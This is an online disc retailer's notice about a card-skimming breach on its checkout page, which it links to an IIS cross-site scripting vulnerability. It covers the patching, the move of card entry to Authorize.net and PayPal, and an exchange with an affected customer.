Website Security Compromise – Site Now Secure
Post Updated September, 26th
It has come to our attention that InfiniteDiscs.com was likely hacked some time in August, and that some customer credit card information entered in our direct credit card checkout was intercepted and shared with a third party.
Our monthly Trustwave PCI Security scan notified us on September, 10th that our site needed a security patch upgrade due to a “Microsoft Internet Information Services (IIS) Cross-Site Scripting Vulnerability.”
At the time we received the notification of this vulnerability, we did not see any evidence that any customer card information had been compromised. However, it was brought to our attention today that several customers have found fraudulent charges on their accounts over the past few days. We suspect that customers who made orders in August and the beginning of September could have had their cards compromised. If you made an order during this time period, please check your credit card statements to make sure that you were not victim to any fraudulent charges.
Website Is Now Secure
This security patch was installed on Tuesday the 19th, and the vulnerability has been resolved. Our Trustwave Scan shows that our site is PCI compliant.
In addition, to ensure that everything is clean and no customer information is at risk, we also had our web hosting company scan to make sure that there are no malicious files on our server. This scan found no signs of malicious scripts.
Card Info Now Entered at Authorize.net
Since the breach, we have also changed our checkout process so that card information will never again be entered on our URL to eliminate the risk of a future cross site scripting hack. All credit card information is now entered directly on our Merchant processing domains Authorize.net or PayPal.com. Infinite Discs does not, and has never collected or stored any customer credit card information. You can be confident that your credit card purchases through InfiniteDiscs.com will be secure.
I was a big fan of your website…till I had to cancel two debit cards and be refunded money by my bank because of fruad on my account. I now know that ordering discs from your website is the cause. I would like to still be able to order from infinite disc but just don’t think I can trust it again.
We have also hated the fact that somebody out there felt it necessary to do this to our customers and to our business. We have constantly changed our firewalls and used secure checkout, but in today’s world, this kind of hacking is breaking down some of the largest companies in the country (see Equifax, Target, etc.). As a result, we have taken all checkout payments completely off of our website. Customers have always had the option to checkout through Paypal, using their security measures. Now when customers select to checkout with credit cards (not using Paypal) they are taken to Authorize.net which is another very large credit card processor. That is the best way we could handle the situation, putting credit card security into the hands of companies that are large, trusted, and more secure than our own small business website.
Just to be clear as well– Infinite Discs has NEVER stored credit card information. We never see it and never have. Any hack was of the card entry page when people were checking out, and that has been completely removed. So, from now on, we not only never see or handle the data, but it isn’t even entered on our website during the checkout process.
Thanks for your support and patience as we’ve worked out this big problem, and I’m glad that the bank took care of the fraudulent charge refunds.